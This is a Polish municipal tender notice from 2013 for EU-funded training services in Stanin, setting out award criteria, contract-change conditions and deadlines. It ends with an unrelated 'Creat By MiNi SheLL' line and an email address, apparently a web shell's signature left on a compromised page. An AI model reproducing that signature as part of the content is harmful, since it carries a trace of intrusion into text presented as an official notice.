<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 30</li>
<li>2 - Doświadczenie i kwalifikacje  kadry dydaktycznej - 30</li>
<li>3 - Doświadczenie Wykonawcy - 40</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany umowy, w przypadku gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizacje przedmiotu umowy. 2) Zamawiający przewiduje możliwość zmiany umowy, w przypadku gdy konieczność wprowadzenia zmian będzie następstwem zmian wytycznych lub zaleceń Instytucji, która przyznała środki na sfinansowanie umowy. 3) Za zgodą Zamawiającego zmiana prowadzącego szkolenie wynikająca z ważnych przyczyn, które nie mogły być wcześniej przewidziane, z zastrzeżeniem, że proponowany przez Wykonawcę w zastępstwo prowadzący szkolenie będzie posiadał wymagane kwalifikacje. 4) Zmiany terminów szkoleń składających się na przedmiot umowy, jeżeli ze względu na wypadek losowy nie będzie możliwe przeprowadzenie szkolenia (w szczególności: wypadek trenera, siła wyższa).
5) Konieczności zmiany terminu realizacji przedmiotu umowy z przyczyn niezawinionych przez strony nie może spowodować zmiany ceny wynikającej z oferty, na podstawie której był dokonany wybór Wykonawcy. 6) Zaistnienia siły wyższej (powódź, pożar, zamieszki, strajki, ataki terrorystyczne, przerwy w dostawie energii elektrycznej) mającej wpływ na realizację umowy. 7) Zmiana postanowień zawartej umowy może nastąpić wyłącznie w przypadkach przewidzianych ustawą oraz postanowieniami niniejszej Specyfikacji Istotnych Warunków Zamówienia, za zgodą obu Stron wyrażoną na piśmie w formie aneksu do umowy, pod rygorem nieważności takiej zmiany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gops-stanin.pl, www.stanin.pl zakładka BIP<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> GminnyOśrodek Pomocy Społecznej w Staninie ul. Stanin 62 21-422 Stanin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.05.2013 godzina 10:00, miejsce: Gminny Ośrodek Pomocy Społecznej w Staninie ul. Stanin 62 21-422 Stanin..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest współfinansowane ze środków Unii Europejskiejw ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego ze środków EFS, Priorytet  VII Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnianie  aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com